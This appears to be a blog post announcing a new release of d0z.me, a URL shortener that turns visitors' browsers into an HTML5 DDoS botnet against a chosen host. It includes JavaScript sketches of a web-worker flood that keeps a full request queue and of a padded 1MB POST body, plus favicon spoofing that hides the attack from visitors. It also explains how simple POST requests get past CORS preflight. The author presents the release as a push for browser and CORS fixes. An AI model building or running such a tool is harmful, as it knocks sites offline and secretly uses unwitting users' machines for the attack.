Well, here we are, about three months since I initially released d0z.me, and I've finally gotten away from school and life for a bit this week and updated it. However, I think it was definitely worth the wait. You can grab the code over at d0z.me's new Google Code repository, and see it in action here.
Beyond making the backend code a little bit less of a disaster than it was originally, I have also made the attack itself significantly more effective. For the impatient among you, I will summarize the changes here:
- More efficient web worker implementation for making the requests.
- Some cosmetic changes that make it less obvious that an attack is occurring.
- Switched to POST requests by default, which allow us to hold server threads longer and exhaust a target's bandwidth.
- Lots of updates to the backend code.
Before I go on though, I'd like to send another big THANK YOU to Lavakumar Kuppan over at andlabs.org for his research, feedback, and suggestions. His research was what originally inspired d0z.me, and he has helped give me a few very useful suggestions on how to improve it. Go follow the andlabs blog. Also, thank you to everyone else who sent in bug reports, suggestions, etc since I released it. You rock.
Web Worker Changes
My original implementation of the HTML5 DDoS attack did its job well, but was not exactly polished. I had some ideas for speed improvements even at the time, but hadn't spent much time optimizing. As it was, it opened four web workers, each making only one request at a time. This produced good results, but was very processor intensive for Firefox users, and wasted valuable time waiting for a response from the server. I was also unable to recreate the results from Lava's original presentation (although this later turned out to be a flaw in my testing procedure).
After I released d0z.me, Lava contacted me and suggested instead that I run one web worker and launch many simultaneous requests. Obviously, running multiple requests at a time is much more efficient. With some slight modifications to the pseudocode he provided (to ensure a full request queue is maintained), I was able to achieve slightly better speeds, using only two web workers instead of four.
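The "keep the request queue full" strategy can be sketched roughly like this (function and variable names are mine for illustration, not the actual d0z.me source):

```javascript
// Sketch of a worker that keeps maxConcurrent requests in flight at all
// times: whenever one request finishes, another is launched immediately,
// so no time is wasted idling while waiting on a response.
function makeFlooder(sendRequest, maxConcurrent) {
  var inFlight = 0;
  var sent = 0;

  function launch() {
    // Top up the queue until maxConcurrent requests are outstanding.
    while (inFlight < maxConcurrent) {
      inFlight++;
      sent++;
      sendRequest(function onDone() {
        inFlight--;
        launch(); // refill the slot that just freed up
      });
    }
  }

  return {
    launch: launch,
    stats: function () { return { inFlight: inFlight, sent: sent }; }
  };
}
```

Inside a real web worker, `sendRequest` would wrap an `XMLHttpRequest` whose completion handler invokes the callback; it is abstracted here so the queue logic stands on its own.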
Originally, d0z.me also implemented an attack almost identical to that of JSLOIC, meaning that an image was constantly reloaded in the background. While it added a few extra requests per second, it was rather insignificant compared to its HTML5 counterpart, could only perform GET requests, and had the serious downside of displaying a progress bar in some browsers. Because of this, it has now been removed. In addition, d0z.me now attempts to pull the embedded site's favicon as its own, so as to appear more legitimate. With these two changes, the URL becomes the only way to tell the embedded site and d0z.me apart in most browsers.
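The favicon trick amounts to deriving the embedded site's icon URL and swapping it in as the current page's icon. A minimal sketch (again, illustrative rather than the actual d0z.me code, and assuming the favicon lives at the conventional /favicon.ico path):

```javascript
// Derive the conventional favicon URL for a target page: keep only the
// scheme + host, then append /favicon.ico. Returns null for non-HTTP URLs.
function faviconUrlFor(targetUrl) {
  var m = /^(https?:\/\/[^\/]+)/.exec(targetUrl);
  return m ? m[1] + "/favicon.ico" : null;
}

// In the browser, the swap would look something like:
//   var link = document.createElement("link");
//   link.rel = "shortcut icon";
//   link.href = faviconUrlFor(embeddedSite);
//   document.getElementsByTagName("head")[0].appendChild(link);
```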
Using POST Requests for Attack Amplification
Advantages of the POST Attack
One limitation of the original d0z.me implementation was that it could do little to consume bandwidth. In addition, while it was able to overwhelm servers with the sheer number of requests, server threads were not held for very long. This meant that it required a decent number of users to significantly affect performance (whether by consuming all available threads, crashing the database, or the like). Bandwidth and thread exhaustion are both commonly used DDoS techniques, so why can't we do the same with HTML5 DDoS? Well, turns out, we can!
While the original version of d0z.me used GET requests, we can also make POST requests via CORS. We can issue roughly the same number of requests per second as with GET, meaning that in most situations, even without a payload, the effect will be similar. However, POST gives us a number of advantages over GET that quickly become apparent.
Unlike the previous version, however, attackers don't need to find large files on the host to overwhelm the host's bandwidth. Given that the default maximum request size is 2GB on Apache, we can send quite sizable requests safely. Most configurations do, in fact, override this default, but we can still send decently large requests regardless. To ensure that it works on most hosts, d0z.me's attack is set to use a 1MB request body. In practice, this is more than sufficient to generate excessive amounts of traffic.
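The padded POST boils down to building a large body once and reusing it for every request, so each request costs the target a full 1MB upload. A rough sketch (names and structure are mine, not the shipped code):

```javascript
// Build a payload of the requested size by repeating a 1KB chunk,
// which is far cheaper than concatenating one character at a time.
var PAYLOAD_BYTES = 1024 * 1024; // 1MB: large, but under common server limits

function buildPayload(bytes) {
  var chunk = new Array(1025).join("A"); // a 1024-character chunk
  var body = "";
  for (var i = 0; i < bytes / 1024; i++) body += chunk;
  return body;
}

// In a worker, each request would then be roughly:
//   var xhr = new XMLHttpRequest();
//   xhr.open("POST", targetUrl, true);
//   xhr.send(payload); // the browser streams the full body to the host
```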
Beyond the bandwidth advantages, we also tie up server threads for much longer, since the host must receive the entire request before responding. While this isn't a "slow POST" style attack like Slowloris, it has a similar effect: tying up processing threads that must receive the overly large requests, and thereby slowing down response times drastically.
F*ckin' CORS, How Does It Work?
So what hosts does this affect, you might ask? Just CORS enabled hosts, right? Wrong.
The CORS working draft defines a series of steps that a browser should go through when attempting to make a cross origin request. First, it should check its cache to see if it has previously connected to this URL within the cache timeout period, and if it has, whether or not cross origin requests were allowed on that URL. If they were allowed, it can go ahead and make the request; if not, the request process should stop there. If, however, the URL is not in the cache, then the draft states that the browser should make a "pre-flight request", which is essentially an empty OPTIONS request asking the server whether the actual cross origin request is permitted. The exception to this rule, however, is if the request is a "simple request", i.e. a GET, HEAD, or POST request. And that exception is the whole story here: since a POST (with a simple content type like text/plain) counts as a simple request, the browser skips the preflight and sends the full request to the target whether or not the target has CORS enabled at all. CORS only controls whether the page gets to read the response, and we don't care about the response.
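The preflight decision above can be condensed into a small predicate (heavily simplified from the working draft, which also considers custom headers, cached permissions, and so on):

```javascript
// Simplified sketch of the CORS preflight decision. A request with a
// "simple" method and a "simple" content type is sent directly, with no
// preflight and no opt-in from the target server.
var SIMPLE_METHODS = ["GET", "HEAD", "POST"];
var SIMPLE_CONTENT_TYPES = [
  "application/x-www-form-urlencoded",
  "multipart/form-data",
  "text/plain"
];

function needsPreflight(method, contentType) {
  if (SIMPLE_METHODS.indexOf(method.toUpperCase()) === -1) return true;
  // A request only stays "simple" with one of the simple content types.
  if (contentType && SIMPLE_CONTENT_TYPES.indexOf(contentType) === -1) return true;
  return false;
}
```

The consequence for the attack is that `needsPreflight("POST", "text/plain")` comes back false, which is exactly why a 1MB POST flood works against hosts that have never heard of CORS.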
I considered adding HTTP referrer / origin obfuscation support, which I previously demonstrated was possible. However, as my goal is not to make d0z.me impossible to detect and block, and I still wanted people to be able to find the site if abuse occurs, I decided against doing so. I think it is sufficient that I have warned multiple times against using that to block attacks. It's a band-aid, not a fix. I also considered adding IE support, but the attack is significantly slower without the benefit of web workers. When IE adds support for web workers, I will attempt to add support for it.
I have left GET requests in as an option, although I believe that it is usually a less effective one. However, it may be better to use such an attack if a host disallows all POST requests, or if a.) CORS is enabled on the URL and b.) responding to that request causes the host to do a significant amount of processing. The GET attack also uses significantly less memory on machines viewing the link, which might be a consideration in some instances.
As I said earlier, it's been three months since I released d0z.me. As far as I can tell, all it has achieved is a GTFO message from Dreamhost and a decent number of complaint emails. I do like to think that it has raised awareness of some of the problems with URL shorteners and HTML5, but no browsers have attempted to limit the number of XHRs that can be made in a given time period (except *maybe* Safari?), and no changes have been made to the CORS working draft. This needs to be fixed.
While I do find a lot of the issues involved here interesting, my main reason for making this new release is to again encourage browser developers and those working on the CORS draft to fix this problem, and do it quickly. I hope it will also be useful for administrators to gauge their systems' susceptibility to these attacks, as well as to come up with defenses against them.